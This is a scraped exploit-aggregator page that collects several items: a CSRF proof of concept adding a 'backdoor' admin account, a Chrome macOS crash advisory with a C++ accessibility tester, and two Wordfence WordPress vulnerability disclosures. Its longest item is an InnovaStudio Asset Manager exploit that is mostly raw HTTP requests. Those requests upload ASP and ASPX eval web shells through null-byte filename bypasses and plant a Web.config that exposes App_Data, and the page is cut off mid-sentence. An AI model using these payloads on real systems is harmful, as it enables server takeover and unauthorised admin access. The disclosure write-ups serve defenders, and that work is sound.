Latest exploits :: CodePwn

<pre><code> CSRF Add Admin: --------------- <html> <body> <form action="http://transmitter/protect/users.htm" method="POST"> <input type="hidden" name="pwd0" value="" /> <input type="hidden" name="pwd0bis" value="" /> <input type="hidden" name="user1" value="" /> <input type="hidden" name="pwd1" value="" /> <input type="hidden" name="pwd1bis" value="" /> <input type="hidden" name="auth1" value="" /> <input type="hidden" name="user2" value="" /> <input type="hidden" name="pwd2" value="" /> <input type="hidden" name="pwd2bis" value="" /> <input type="hidden" name="auth2" value="" /> <input type="hidden" name="user3" value="backdoor" /> <input type="hidden" name="pwd3" value="backdoor123" /> <input type="hidden" name="pwd3bis" value="backdoor123" /> <input type="hidden" name="auth3" value="2" /> <input type="submit" value="Adminize!" /> </form> </body> </html> </code></pre>

<pre><code> Google Chrome Browser 111.0.5563.64 AXPlatformNodeCocoa Fatal OOM/Crash (macOS) Vendor: Google LLC Product web page: https://www.google.com Affected version: 111.0.5563.64 (Official Build) (x86_64) 110.0.5481.100 (Official Build) (x86_64) 108.0.5359.124 (Official Build) (x86_64) 108.0.5359.98 (Official Build) (x86_64) Fixed version: 112.0.5615.49 (Official Build) (x86_64) Summary: Google Chrome browser is a free web browser used for accessing the internet and running web-based applications. The Google Chrome browser is based on the open source Chromium web browser project. Google released Chrome in 2008 and issues several updates a year. Desc: Fatal OOM/crash of Chrome browser while detaching/attaching tabs on macOS. Commit fix: "The original cl landed many months ago, but chrome/browser/ui/views/frame/browser_non_client_frame_view_mac.mm is the only change that didn't revert cleanly." macOS a11y: Implement accessibilityHitTest for remote app shims (PWAs) Implements accessibility hit testing for RemoteCocoa so that Hover Text and VoiceOver mouse mode can read the accessible objects under the user's pointer. Cross-process plumbing was needed because RemoteCocoa bridges to native controls in a separate app shim process and must report accessibility trees from the browser process via the undocumented NSAccessibilityRemoteUIElement mechanism. This CL does the following: 1. Unblocks remote accessibilityHitTest by calling setRemoteUIApp:YES in the browser process. This enables the browser process to accept redirected accessibilityHitTest calls to the object corresponding to any NSAccessibilityRemoteUIElement returned by the original accessibilityHitTest at the app shim process. 2. (For Browser UI) Overrides NativeWidgetMacNSWindowTitledFrame's accessibilityHitTest to have a custom implementation with NSAccessibilityRemoteUIElement support so that custom window controls can be found. Additionally, adjusts the BrowserView bounds so that AXPlatformNodeCocoa's accessibilityHitTest (which doesn't support view targeting) can return controls in the web app frame toolbar. 3. (For Web Content) Implements RenderWidgetHostViewCocoa's accessibilityHitTest for instances in the app shim to return a NSAccessibilityRemoteUIElement corresponding to their counterparts in the browser process so that web content objects can be found. Tested on: macOS 12.6.1 (Monterey) macOS 13.3.1 (Ventura) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2023-5770 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5770.php 08.12.2022 -- UI PoC: ------- 1. Grab a tab and detach it. 2. Bring back the tab. 3. Do this 2-3 times attaching / re-attaching the tab. 4. Chrome will hang (100% CPU) / Out-of-Memory (OOM) for 7-8 minutes. 5. Process crashes entirely. Ref: Issue 1400682 (Ticket created: Dec 13, 2022) Ref: https://bugs.chromium.org/p/chromium/issues/detail?id=1400682 Ref: https://chromium-review.googlesource.com/c/chromium/src/+/3861171 Ref: axtester.mm terminal PoC by xi.ch...@gmail.com (https://bugs.chromium.org/u/161486905) ============= // // Copyright (c) Microsoft Corporation. All rights reserved. // #include <ApplicationServices/ApplicationServices.h> #include <iostream> #include <sstream> #include <vector> __BEGIN_DECLS // NOLINTNEXTLINE AXError _AXUIElementGetWindow(AXUIElementRef, CGWindowID *); // NOLINTNEXTLINE CFTypeID AXTextMarkerGetTypeID(); __END_DECLS std::ostream& bold_on(std::ostream& os) { if (isatty(STDOUT_FILENO)) { return os << "\e[1m"; } return os; } std::ostream& bold_off(std::ostream& os) { if (isatty(STDOUT_FILENO)) { return os << "\e[0m"; } return os; } std::string from_cfstr(CFTypeRef cf_ref) { if (cf_ref != nullptr && CFGetTypeID(cf_ref) == CFStringGetTypeID()) { const auto cf_str = static_cast<CFStringRef>(cf_ref); const auto max_length = static_cast<size_t>(CFStringGetMaximumSizeForEncoding( CFStringGetLength(cf_str), kCFStringEncodingUTF8)) + 1; auto result = std::string(max_length, '\0'); if (CFStringGetCString(cf_str, result.data(), static_cast<CFIndex>(max_length), kCFStringEncodingUTF8)) { if (const auto pos = result.find('\0'); pos != std::string::npos) { result.resize(pos); } return result; } } return {}; } std::string ax_element_id(AXUIElementRef value) { // AX element cache - AX elements are backed by CFData // (referring to 'remote' AX objects) and this data is // 'stable' across 'volatile' instances of AXUIElement. // 'hash and equality' of AX elements are based on this // data and therefore, we can use AXUIElement objects as // 'keys' in a dictionary with values, identifying these // objects (uniquely). const static auto ax_elements = CFDictionaryCreateMutable(kCFAllocatorDefault, 0, &kCFTypeDictionaryKeyCallBacks, &kCFTypeDictionaryValueCallBacks); auto ax_id = CFDictionaryGetValue(ax_elements, value); if (ax_id == nullptr) { if (const auto uuid = CFUUIDCreate(kCFAllocatorDefault)) { if (const auto uuid_s = CFUUIDCreateString(kCFAllocatorDefault, uuid)) { CFDictionarySetValue(ax_elements, value, uuid_s); CFRelease(uuid_s); } CFRelease(uuid); } ax_id = CFDictionaryGetValue(ax_elements, value); } return from_cfstr(ax_id); } template <typename T> T ax_attribute_value(AXUIElementRef e, CFStringRef name) { if (e != nullptr) { auto ref = T{}; if (AXUIElementCopyAttributeValue(e, name, (CFTypeRef *) &ref) == kAXErrorSuccess) { return ref; } } return nullptr; } // NOLINTNEXTLINE void ax_traverse(AXUIElementRef elem, uint32_t depth) { const auto max_depth = 10; if (depth > max_depth) { return; } const auto indent = [&]() { for (auto x = 0; x < depth; x++) { std::cout << " "; } }; auto wid = CGWindowID{}; if (_AXUIElementGetWindow(elem, &wid) != kAXErrorSuccess) { wid = 0; } indent(); const auto role = ax_attribute_value<CFTypeRef>(elem, kAXRoleAttribute); std::cout << bold_on << "[*** DEPTH: " << depth << ", ROLE: " << from_cfstr(role) << ", ID: " << ax_element_id(elem) << ", WINDOW: " << wid << " ***]" << bold_off << std::endl; if (const auto children = ax_attribute_value<CFArrayRef>(elem, kAXChildrenAttribute)) { for (CFIndex idx = 0; idx < CFArrayGetCount(children); idx++) { const auto element = static_cast<AXUIElementRef>(CFArrayGetValueAtIndex(children, idx)); ax_traverse(element, depth + 1); } CFRelease(children); } } int main(int argc, char* const argv[]) { auto pid = 0; if (argc > 1) { if (!AXIsProcessTrusted()) { std::cerr << "Please 'AX approve' Terminal in System Preferences" << std::endl; exit(1); // NOLINT } // NOLINTNEXTLINE pid = std::stoi(argv[1]); } else { std::cerr << "usage: axtester <pid>" << std::endl; exit(1); // NOLINT } if (const auto app = AXUIElementCreateApplication(pid)) { auto observer = AXObserverRef{}; auto ret = AXObserverCreate(pid, [](auto /*unused*/, AXUIElementRef /*unused*/, CFStringRef name, auto ctx) { auto myapp = (__AXUIElement*)(ctx); auto hint = CFStringGetCStringPtr(name,kCFStringEncodingUTF8); std::cout << "Hint: " << hint << std::endl; ax_traverse(myapp, 0); }, &observer); if (kAXErrorSuccess != ret) { std::cerr << "Fail to create observer" << std::endl; return -1; } std::cout << "title:" << AXObserverAddNotification(observer, app, kAXTitleChangedNotification, (void*)app) << std::endl; std::cout << "focus_window:" << AXObserverAddNotification(observer, app, kAXFocusedWindowChangedNotification, (void*)app) << std::endl; std::cout << "focus_element:" << AXObserverAddNotification(observer, app, kAXFocusedUIElementChangedNotification, (void*)app) << std::endl; std::cout << "move:" << AXObserverAddNotification(observer, app, kAXWindowMovedNotification, (void*)app) << std::endl; std::cout << "resize:" << AXObserverAddNotification(observer, app, kAXWindowResizedNotification, (void*)app) << std::endl; std::cout << "deminiaturized:" << AXObserverAddNotification(observer, app, kAXWindowDeminiaturizedNotification, (void*)app) << std::endl; std::cout << "miniaturize:" << AXObserverAddNotification(observer, app, kAXWindowMiniaturizedNotification, (void*)app) << std::endl; CFRunLoopAddSource(CFRunLoopGetCurrent(), AXObserverGetRunLoopSource(observer), kCFRunLoopDefaultMode); CFRunLoopRun(); } return 0; } --codeaibot explains-- This is a C++ program that uses the Accessibility API (AX) provided by macOS to traverse the user interface of a running application and print out information about the accessibility elements that it finds. The program takes a single argument, which is the process ID (PID) of the application to examine. If no argument is provided, the program displays a usage message and exits. The main() function first checks if the Terminal app has been granted accessibility privileges by calling the AXIsProcessTrusted() function. If it hasn't, the program displays an error message and exits. If the Terminal app has been granted accessibility privileges, the program creates an AXUIElementRef object for the application using the AXUIElementCreateApplication() function, passing in the PID as an argument. The ax_traverse() function is then called with the root accessibility element of the application as an argument. This function recursively traverses the accessibility tree of the application, printing out information about each element it encounters. The program also defines several helper functions for working with Core Foundation types (from_cfstr(), ax_element_id(), and ax_attribute_value()), as well as some functions for printing formatted output to the console (bold_on() and bold_off()). -- / -- As this issue is not a security issue nor results in security consequences, this report is not eligible for a VRP reward. ++ Thank you Amy! -- </code></pre>

<pre><code>The Wordfence team responsibly disclosed an authenticated Privilege Escalation vulnerability in the WP Data Access plugin. On April 5, 2023 the Wordfence Threat Intelligence team initiated the responsible disclosure process for a vulnerability we discovered in WP Data Access, a WordPress plugin that is installed on over 10,000 sites. This flaw makes it possible for an authenticated attacker to grant themselves administrative privileges via a profile update, if the targeted site has the ‘Role Management’ setting enabled. Wordfence Premium, Care, and Response users received a firewall rule to protect against any exploits targeting this vulnerability on April 5, 2023. Sites still using the free version of Wordfence will receive the same protection on May 5, 2023. We performed our initial outreach to the developer on April 5, 2023, the same day we discovered the vulnerability. We received a response the same day and sent over the full details. The developer released a patch swiftly the next day on April 6, 2023. We’d like to say a special thanks to the lead developer of WP Data Access, Peter Schulz, who provided an exemplary example of how security issues should be handled by responding immediately and releasing a patch the next day. We strongly recommend ensuring that your site has been updated to the latest patched version of WP Data Access, which is version 5.3.8 at the time of this publication. This email content has also been published on our blog and you're welcome to post a comment there if you'd like to join the conversation. Or you can read the full post in this email. Vulnerability Summary From Wordfence Intelligence Description: WP Data Access <= 5.3.7 – Authenticated (Subscriber+) Privilege Escalation Affected Plugin: WP Data Access Plugin Slug: wp-data-access Affected Versions: <= 5.3.7 CVE ID: CVE-2023-1874 CVSS Score: 7.5 (High) CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H Researcher/s: Chloe Chamberland Fully Patched Version: 5.3.8 The WP Data Access plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 5.3.7. This is due to a lack of authorization checks on the multiple_roles_update function. This makes it possible for authenticated attackers, with minimal permissions such as a subscriber, to modify their user role by supplying the ‘wpda_role[]‘ parameter during a profile update. This requires the ‘Enable role management’ setting to be enabled for the site. Vulnerability Analysis WP Data Access is a WordPress plugin designed to make data table creation in WordPress more intuitive and easier to manage for site owners. One feature of the plugin is the ability to enable role management, which makes it possible for a site owner to create custom roles and assign multiple roles to different users. Unfortunately, this functionality was insecurely implemented making it possible for authenticated users to assign any role to themselves, including the administrative role. Taking a closer look at the code, we see that the ‘multiple_roles_update‘ function used to assign a user’s new roles upon updating a profile is hooked via ‘’profile_update‘’. This hook is triggered immediately after any user profile is updated and it does not perform any sort of authorization checks on the user performing the action. As such, this means that any update to a user’s profile, including on the profile.php page, will invoke the hooked function ‘multiple_roles_update‘. This makes it possible for any authenticated users with an account, such as subscribers, to invoke the ‘multiple_roles_update‘ function. $this->loader->add_action( 'profile_update', $wpda_roles, 'multiple_roles_update' ); If the associated function had a capability check, then it may have prevented these users from fully executing the function, however, that was not the case. Reviewing the hooked function, we see a check verifying that the role management setting is enabled, but nothing more. The function then determines the user and looks for the ‘wpda_role‘ array parameter from a given request. If present, it will process the supplied roles and add the role and applicable permissions to the user retrieved in the first step. This made it possible for authenticated users, such as a subscriber, making profile updates to supply the ‘wpda_role‘ array parameter with any desired roles, such as administrator, during a profile update that would be granted immediately upon save of the profile updates. [Code snippet can be found on the blog] As with any Privilege Escalation vulnerability, this can be used for complete site compromise. Once an attacker has gained administrative user access to a WordPress site they can then manipulate anything on the targeted site as a normal administrator would. This includes the ability to upload plugin and theme files, which can be malicious zip files containing backdoors, and modifying posts and pages which can be leveraged to redirect site users to other malicious sites. Disclosure Timeline April 5, 2023 – Discovery of the Privilege Escalation vulnerability in WP Data Access. Wordfence Premium, Care, and Response users receive a firewall rule to provide protection against any exploits that may target this vulnerability. April 5, 2023 – We initiate contact with the plugin vendor asking that they confirm the inbox for handling the discussion. April 5, 2023 – The vendor confirms the inbox for handling the discussion. April 5, 2023 – We send over the full disclosure details. The vendor acknowledges the report and begins working on a fix. April 6, 2023 – A fully patched version of the plugin, 5.3.8, is released. May 5, 2023 – Wordfence free users receive the firewall rule. Conclusion In today’s post, we detailed a flaw in the WP Data Access plugin that enabled authenticated attackers, with at least subscriber-level access to a site, to elevate their privileges to that of a site administrator which could ultimately lead to complete site compromise. This flaw has been fully patched in version 5.3.8. We recommend that WordPress users immediately verify that their site has been updated to the latest patched version available, which is version 5.3.8 at the time of this publication. Wordfence Premium, Care, and Response users received a firewall rule to protect against any exploits targeting this vulnerability on April 5, 2023. Sites still using the free version of Wordfence will receive the same protection on May 5, 2023. If you know a friend or colleague who is using this plugin on their site, we highly recommend forwarding this advisory to them to help keep their sites protected as this is a serious vulnerability that can lead to a complete site takeover. If you are a security researcher, you can responsibly disclose your finds to us and obtain a CVE ID and get your name on the Wordfence Intelligence leaderboard. </code></pre>

<pre><code>On January 26, 2023, the Wordfence team responsibly disclosed an unauthenticated stored Cross-Site Scripting vulnerability in Limit Login Attempts, a WordPress plugin installed on over 600,000 sites that provides site owners with the ability to block IP addresses that have made repeated failed login attempts. The plugin is vulnerable in versions up to, and including, 1.7.1. A patch addressing this vulnerability was released on April 4, 2023 as version 1.7.2. We recommend all site owners update to version 1.7.2 as soon as possible. All Wordfence Premium, Wordfence Care, and Wordfence Response customers, along with those still using the free version of the plugin, are protected by the Wordfence firewall against any exploits targeting this vulnerability. This email content has also been published on our blog and you're welcome to post a comment there if you'd like to join the conversation. Or you can read the full post in this email. Vulnerability Summary Description: Limit Login Attempts <= 1.7.1 – Unauthenticated Stored Cross-Site Scripting Affected Plugin: Limit Login Attempts Plugin Slug: limit-login-attempts Affected Versions: <= 1.7.1 CVE ID: CVE-2023-1912 CVSS Score: 7.2 (High) CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N Researcher/s: Marco Wotschka Fully Patched Version: 1.7.2 Vulnerability Details The Limit Login Attempts plugin offers some simple configuration options. These include a maximum number of login retries, lockout duration, lockout expiration times as well as some logging and notification options. The vulnerability, assigned CVE-2023-1912, requires a specific configuration: the site connection option must be set to “From behind a reversy [sic] proxy” and logging of IP addresses on lockout must be enabled. limit-login-attempts-config-page With the reverse proxy detection option enabled, the plugin uses the X-Forwarded-For header to determine the visitor’s IP address. While this HTTP header is spoofable, the plugin does offer its use as an alternative for those who are behind a load balancer or cache handler. It does not use this setting by default. With the plugin’s logging feature enabled, login blocks are logged and displayed on the configuration page. The following code accomplishes this (slightly edited for legibility). limit-login-attempts-vuln-code As can be seen, this function assembles a table of information but does not escape the values it uses. While sanitization is recommended as input is received, escaping output, even if it is already sanitized, is a far more effective tool in preventing Cross-Site Scripting. Unfortunately, this plugin was not utilizing either sanitization or escaping of the stored IP value that could be supplied via the X-Forwarded-For: header. To exploit this vulnerability, an attacker could send a login request with the following X-Forwarded-For header set: X-Forwarded-For: 23.23.23.23 This header can be set via many methods, such as through a browser plugin or by intercepting the login request and adding it manually. Once the plugin’s blocking threshold is met, it will record the above code as the blocked IP and execute the malicious JavaScript code when an administrator visits the configuration page where the list of blocked IP addresses is displayed. This malicious code is executed under the authentication of an administrator and can be utilized to help facilitate a site takeover. Cross-Site Scripting Vulnerabilities are the result of missing sanitization and unescaped display of user input. Most commonly, we see user input that is exploitable to Cross-Site Scripting collected via a form. In this vulnerability, the processed information is still provided by a user, but collected via a different and more unusual route which is why proper sanitization and escaping may have been missed. Timeline January 26, 2023 – We reached out directly to the WordPress Plugin Security Team as no contact information was readily available for the developer of the plugin. March 24, 2023 – The WordPress Plugin Security Team team acknowledges receipt of our report. April 4, 2023 – Version 1.7.2 addresses this issue. Conclusion In today’s post, we covered an unauthenticated Cross-Site Scripting vulnerability via the X-Forwarded-For header in the Limit Login Attempts plugin. This can be leveraged by unauthenticated attackers to facilitate a site takeover by injecting malicious JavaScript into the database of an affected site that may execute when a site administrator accesses the logging page. Again, all Wordfence Premium, Wordfence Care, and Wordfence Response customers, along with those still using the free version of the plugin, are protected by the Wordfence firewall for any exploits targeting this vulnerability. Special Note: We independently discovered this vulnerability in January while reviewing a vulnerability in another plugin. We followed our responsible disclosure process and reported it to the WordPress Plugin Security Team, ensured it got patched, and published it to our vulnerability database once a patch was released. After adding the vulnerability to our database, we were made aware of another unnamed security researcher who also discovered this issue and publicly disclosed details about this vulnerability five years ago without ensuring the vulnerability got patched, which does not follow standard practice. Regardless, we would like to make mention of this so the other researcher who also found the vulnerability receives credit. If you have any friends or colleagues who are using this plugin, please share this announcement with them and encourage them to update to the latest version of Limit Login Attempts as soon as possible. If you are a security researcher, you can responsibly disclose your finds to us and obtain a CVE ID and get your name on the Wordfence Intelligence leaderboard. </code></pre>

<pre><code># Exploit Title: InnovaStudio WYSIWYG Editor 5.4 (ASSET MANAGER) Unrestricted File Upload / Directory Traversal / Multiple WebApps Exploit # Date: 11/04/2023 # Exploit Author: Zer0FauLT [admindeepsec@proton.me] # Vendor Homepage: innovastudio.com # Product: Asset Manager # Version: <= Asset Manager ASP Version 5.4 # Tested on: Windows 10 and Windows Server 2019 # CVE : 0DAY ################################################################################################## # # # ASP version, in i_upload_object_FSO.asp, line 234 # # # # oUpload.AllowedTypes = "gif|jpg|png|wma|wmv|swf|doc|zip|pdf|txt" # # # ################################################################################################## ||==============================================================================|| || ((((1)))) || || || || ...:::We Trying Upload ASP-ASPX-PHP-CER-OTHER SHELL FILE EXTENSIONS:::... || ||==============================================================================|| ################################################################################################## " " " FILE PERMISSIONS : [ 0644 ] " " " " DIR PERMISSIONS : [ 0755 ] " " " " UPLOAD FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets ] " " " ################################################################################################## ================================================================================================== POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2 Host: www.pentest.com Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG Content-Length: 473 Cache-Control: max-age=0 Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: https://www.pentest.com Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFo1Ek0VVUzPm1AxS User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://www.pentest.com/editor/assetmanager/assetmanager.asp Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 ------WebKitFormBoundaryFo1Ek0VVUzPm1AxS Content-Disposition: form-data; name="inpCurrFolder2" C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets ------WebKitFormBoundaryFo1Ek0VVUzPm1AxS Content-Disposition: form-data; name="inpFilter" ------WebKitFormBoundaryFo1Ek0VVUzPm1AxS Content-Disposition: form-data; name="File1"; filename="shell.asp" Content-Type: application/octet-stream <%eval request("#11")%> ------WebKitFormBoundaryFo1Ek0VVUzPm1AxS-- ================================================================================================== " ...[ RESPONCE ]... " " " " ASP-ASPX-PHP-CER-OTHER FILE EXTENSIONS to types is not allowed. " " " ================================================================================================== *** ||================================================================================|| || ((((2)))) || || || || ...:::Now we will manipulate the filename: ===>>> filename="shell.asp":::... || || || ||================================================================================|| ################################################################################################## " " " FILE PERMISSIONS : [ 0644 ] " " " " DIR PERMISSIONS : [ 0755 ] " " " " UPLOAD FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets ] " " " ################################################################################################## ================================================================================================== POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2 Host: www.pentest.com Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG Content-Length: 473 Cache-Control: max-age=0 Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: https://www.pentest.com Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFo1Ek0VVUzPm1AxS User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://www.pentest.com/editor/assetmanager/assetmanager.asp Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 ------WebKitFormBoundaryFo1Ek0VVUzPm1AxS Content-Disposition: form-data; name="inpCurrFolder2" C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets ------WebKitFormBoundaryFo1Ek0VVUzPm1AxS Content-Disposition: form-data; name="inpFilter" ------WebKitFormBoundaryFo1Ek0VVUzPm1AxS Content-Disposition: form-data; name="File1"; filename="shell.asp%00asp.txt" Content-Type: application/octet-stream <%eval request("#11")%> ------WebKitFormBoundaryFo1Ek0VVUzPm1AxS-- ================================================================================================== " >>> filename="shell.asp%00asp.txt" <<< " " " " [ %00 ] ===> We select these values > Right Click > Convert Selecetion > URL > URL-decode " " " " or " " " " CTRL+Shift+U " " " " SEND! " " " ================================================================================================== " ...[ RESPONCE ]... " " " " OK! " " " " UPLOADED FOLDER: [ C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets\shell.asp ] " " " " SHELL PATH: https://www.pentest.com/editor/assets/shell.asp/aspx/php/cer/[Unrestricted] " " " ================================================================================================== *** ||==============================================================================|| || ((((3)))) || || || || ...:::NO WRITE PERMISSION!:::... || || || || ...:::Directory Traversal:::... || || || ||==============================================================================|| ################################################################################################## " " " FILE PERMISSIONS : [ 0600 ] " " " " DEFAULT DIR[\Editor\assets] PERMISSIONS : [ 0700 ] " " " " OTHER[App_Data] DIR PERMISSIONS : [ 0777 ] " " " " DEFAULT FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets ] " " " " App_Data FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data ] " " " " TEST WORK DIR : https://www.pentest.com/App_Data <<<= [ 404 ERROR - N/A ] " " " " " ################################################################################################## ########################################################################################################################################################## # # # What is the App_Data Folder useful? # # App_Data contains application data files including .mdf database files, XML files, and other data store files. # # The App_Data folder is used by ASP.NET to store an application's local database, such as the database for maintaining membership and role information. # # The App_Data folder is not public like the other website directories under the Home Directory. # # Because it's a private directory, the IIS server hides it for security reasons. # # Now, we will test whether such a directory exists. # # If the directory exists, we will make it public so that we can define the necessary server functions for running a shell within it. # # For this we will try to load a special server configuration file. This is a Web.Config file. With this we'll ByPass the directory privacy. # # So the directory will be public and it will be able to respond to external queries and run a shell. # # # ########################################################################################################################################################## ================================================================================================== POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2 Host: www.pentest.com Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG Content-Length: 473 Cache-Control: max-age=0 Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: https://www.pentest.com Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFo1Ek0VVUzPm1AxS User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://www.pentest.com/editor/assetmanager/assetmanager.asp Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 ------WebKitFormBoundaryFo1Ek0VVUzPm1AxS Content-Disposition: form-data; name="inpCurrFolder2" C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data ------WebKitFormBoundaryFo1Ek0VVUzPm1AxS Content-Disposition: form-data; name="inpFilter" ------WebKitFormBoundaryFo1Ek0VVUzPm1AxS Content-Disposition: form-data; name="File1"; filename="Web.Config%00net.txt" Content-Type: application/octet-stream <configuration> <system.webServer> <defaultDocument> <files> <add value="*.asp" /> <add value="*.aspx" /> <add value="*.php" /> </files> </defaultDocument> <security> <requestFiltering> <hiddenSegments> <clear /> </hiddenSegments> </requestFiltering> </security> </system.webServer> </configuration> ------WebKitFormBoundaryFo1Ek0VVUzPm1AxS-- ================================================================================================== " ...[ RESPONCE ]... " " " " OK! " " " " UPLOADED FOLDER: [ C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data\Web.Config ] " " " " TEST WORK for App_Data DIR : https://www.pentest.com/App_Data <<<= [ 403 ERROR - OK. ] " " " ================================================================================================== # Now we will upload your shell to the directory where we made ByPass. # ================================================================================================== POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2 Host: www.pentest.com Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG Content-Length: 473 Cache-Control: max-age=0 Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: https://www.pentest.com Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFo1Ek0VVUzPm1AxS User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://www.pentest.com/editor/assetmanager/assetmanager.asp Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 ------WebKitFormBoundaryFo1Ek0VVUzPm1AxS Content-Disposition: form-data; name="inpCurrFolder2" C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data ------WebKitFormBoundaryFo1Ek0VVUzPm1AxS Content-Disposition: form-data; name="inpFilter" ------WebKitFormBoundaryFo1Ek0VVUzPm1AxS Content-Disposition: form-data; name="File1"; filename="shell.aspx%00aspx.txt" Content-Type: application/octet-stream <%@PAGE LANGUAGE=JSCRIPT EnableTheming = "False" StylesheetTheme="" Theme="" %> <%var PAY:String= Request["\x61\x62\x63\x64"];eval (PAY,"\x75\x6E\x73\x61"+ "\x66\x65");%> ------WebKitFormBoundaryFo1Ek0VVUzPm1AxS-- ====================================================================================================== " ...[ RESPONCE ]... " " " " OK! " " " " UPLOADED FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data\shell.aspx ] " " " " TEST WORK for Shell : https://www.pentest.com/App_Data/shell.aspx <<<= [ OK. ] " " " ========================================================================================================================================== " " " So what can we do if no directory on the site has write permission? " " If not, we will test for vulnerabilities in the paths of other applications running on the server. " " Sometimes this can be a mail service related vulnerability, " " Sometimes also it can be a "Service Permissions" vulnerability. " " Sometimes 